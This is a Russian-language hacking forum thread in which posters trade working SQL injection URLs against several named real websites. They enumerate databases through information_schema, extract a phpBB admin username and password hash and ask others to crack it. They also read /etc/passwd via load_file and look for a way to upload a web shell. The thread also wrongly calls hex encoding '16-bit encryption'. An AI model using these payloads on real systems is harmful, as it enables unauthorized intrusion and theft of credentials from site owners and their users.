slider слух у мну вопрос!Как ты вычислил ентот managerpassword и managerlogin ??? Методом тыка или как? Просто вот такой вот ссылкочкой например www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,column_schema)+from+information_schema.columns+limit+1,1/* Мне ошибку пишет!!! Обьясни плиз я в этом деле новичек ((
2 BanQui А что это у тебя за столбец column_schema? Может нужно так ? http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+1,1/* Ошибки нету
СПс терь другой вопрос смари http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+1,1/* - Ошибки нет http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+2,1/* - Ошибки нет И так до 4 а вот тут http://www.creeknationcasino.com/index.cfm?id=-11+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat(column_name,0x3a,table_schema)+from+information_schema.columns+limit+5,1/* - Ошибка есть и дальше они тоже присутствуют!
Omg!Приношу свой извенения за свой тупизм)))))Спасибо!!! Вазьму на заметку ИМХО много раз отступал от взлома сайтоф именно по этому((
Кстати вот тут еще одну фигню нашел токо что то не получаетцо никак информатион схемку вывести! Версия 4.0.24_Debian-10sarge2-log Вот как пытался и пытаюсь чтото менять но пока не выходит ((( http://www.audit.by/new/index.php?id=10&spr=-999999+union+select+1,2,table_name+from+information_schema.tables+limit+1,1/*
см. мой совет выше ^-^ в 4.0.24 нет information_schema... вапросы по уязвимостям тут, а то щас и тебе и мне минусов наставят...
Нашел вот енто http://www.adams-motors.ru/new.php?id=-2+union+select+1,TABLE_NAME,concat(column_name,0x3a,table_schema)%20FROM%20INFORMATION_SCHEMA.columns+limit+559,1/* Попыталсо сделать вот так: http://www.adams-motors.ru/new.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(0x3a,user_newpasswd),0x71),0x71)%20FROM%20adamsold/* Нече не выходит!!!
блин что вы курите... Вот смотрим версию Code: http://www.adams-motors.ru/new.php?id=-2+union+select+version(),2,3/* Ага версия пятая смотрим таблицы Code: http://www.adams-motors.ru/new.php?id=-2+union+select+table_name,2,3+from+information_schema.tables+limit+1,1/* находим таблицы вот актуальные Code: Action Akssesuar Colors Complekt Foto Foto_old Marks Menu Models Old_avto People Texts Vacancy accessories all_details details documentation files files_up forum graphic_people inner news news_details дальше идут таблицы форума (на движке phpbb) среди них есть таблица phpbb_users роем на колонки Code: http://www.adams-motors.ru/new.php?id=-2+union+select+column_name,2,3+from+information_schema.columns+where+table_name=0x70687062625f7573657273+limit+1,1/* Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users находим нужные нам колонки username и user_password и составляем запрос Code: http://www.adams-motors.ru/new.php?id=-2+union+select+concat_ws(0x3a,username,user_password),2,3+from+phpbb_users+limit+1,1/* Получаем логин админа и зашифрованый пароль а именно admin:178f6c2365ac7511b4bf37c8e89cc678 кто расшифрует скиньте пасс в личку плиз. Вот и все
Неправильно выставленные права мускул юзера позволяют читать (и возможно писать) файлы: http://ns1.profsurv.com/category_list.php?x_category_id=-1%20union%20select%20load_file(0x2f6574632f706173737764) Не смог найти документрут чтобы залить шелл, кто найдет раскрытие пути или документрут - скиньте в личку, интересно.
Где 0x70687062625f7573657273 зашифрованое 16ти битным шифрованием наша таблица phpbb_users Научите переводить в 16бит!!!
